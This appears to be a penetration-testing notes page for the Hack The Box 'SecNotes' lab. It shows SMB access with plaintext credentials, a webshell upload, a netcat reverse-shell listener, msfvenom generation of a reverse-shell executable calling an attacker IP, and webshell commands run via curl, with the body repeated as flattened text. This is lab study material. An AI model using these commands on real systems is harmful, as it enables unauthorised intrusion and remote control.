5 :445 smb

# using creds for smb
$ smbmap -H secnotes.htb -u tyler -p '92g!mA8BGjOirkL%OG*&'
[+] IP: secnotes.htb:445        Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        new-site                                                READ, WRITE
		
$ smbclient //secnotes.htb/new-site -U 'tyler%92g!mA8BGjOirkL%OG*&'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Sep 30 12:13:08 2021
  ..                                  D        0  Thu Sep 30 12:13:08 2021
  iisstart.htm                        A      696  Thu Jun 21 08:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 08:26:03 2018

# seems like :8808
# shells were not loading
# but kashz.txt file did, so we need to find a working extension

http://secnotes.htb:8808/web.php | 
500 Internal server error.

# webshell not loading but its running,
# used php rev shell and worked

$ nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 52720
SOCKET: Shell has connected! PID: 8772
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>whoami
iis apppool\newsite

C:\inetpub\new-site>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled

C:\inetpub\new-site>systeminfo
Host Name:                 SECNOTES
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.

# PrintSpoofer64.exe

# shell breaks every 1-2 min and files from ftp is cleaned out.
# putting a msfvenom shell

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=6969 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe

# get shell,
# move kashz.exe to C:\Users\Public
# run it

ALTERNATE USER

# we have creds for tyler for SMB, so we should get tyler as user.
# get php shell and using curl cmd shows whomami as tyler

$ curl "http://secnotes.htb:8808/k.php?cmd=whoami"
<pre>secnotes\tyler</pre>

# we can use powershell encoded revshell and url encode it and use with curl

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 51490

PS C:\inetpub\new-site> whoami
secnotes\tyler

Previous6 box enum iis apppool Next4 :80 CSRF

Last updated 3 years ago

# using creds for smb $ smbmap -H secnotes.htb -u tyler -p '92g!mA8BGjOirkL%OG*&' [+] IP: secnotes.htb:445 Name: unknown Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC new-site READ, WRITE $ smbclient //secnotes.htb/new-site -U 'tyler%92g!mA8BGjOirkL%OG*&' Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Sep 30 12:13:08 2021 .. D 0 Thu Sep 30 12:13:08 2021 iisstart.htm A 696 Thu Jun 21 08:26:03 2018 iisstart.png A 98757 Thu Jun 21 08:26:03 2018 # seems like :8808 # shells were not loading # but kashz.txt file did, so we need to find a working extension http://secnotes.htb:8808/web.php | 500 Internal server error. # webshell not loading but its running, # used php rev shell and worked $ nc -lvnp 445 listening on [any] 445 ... connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 52720 SOCKET: Shell has connected! PID: 8772 Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\new-site>whoami iis apppool\newsite C:\inetpub\new-site>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled C:\inetpub\new-site>systeminfo Host Name: SECNOTES OS Name: Microsoft Windows 10 Enterprise OS Version: 10.0.17134 N/A Build 17134 System Type: x64-based PC Hotfix(s): 2 Hotfix(s) Installed. # PrintSpoofer64.exe # shell breaks every 1-2 min and files from ftp is cleaned out. # putting a msfvenom shell $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=6969 -f exe -o kashz.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: kashz.exe # get shell, # move kashz.exe to C:\Users\Public # run it

ALTERNATE USER

# we have creds for tyler for SMB, so we should get tyler as user.
# get php shell and using curl cmd shows whomami as tyler

$ curl "http://secnotes.htb:8808/k.php?cmd=whoami"
<pre>secnotes\tyler</pre>

# we can use powershell encoded revshell and url encode it and use with curl

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 51490

PS C:\inetpub\new-site> whoami
secnotes\tyler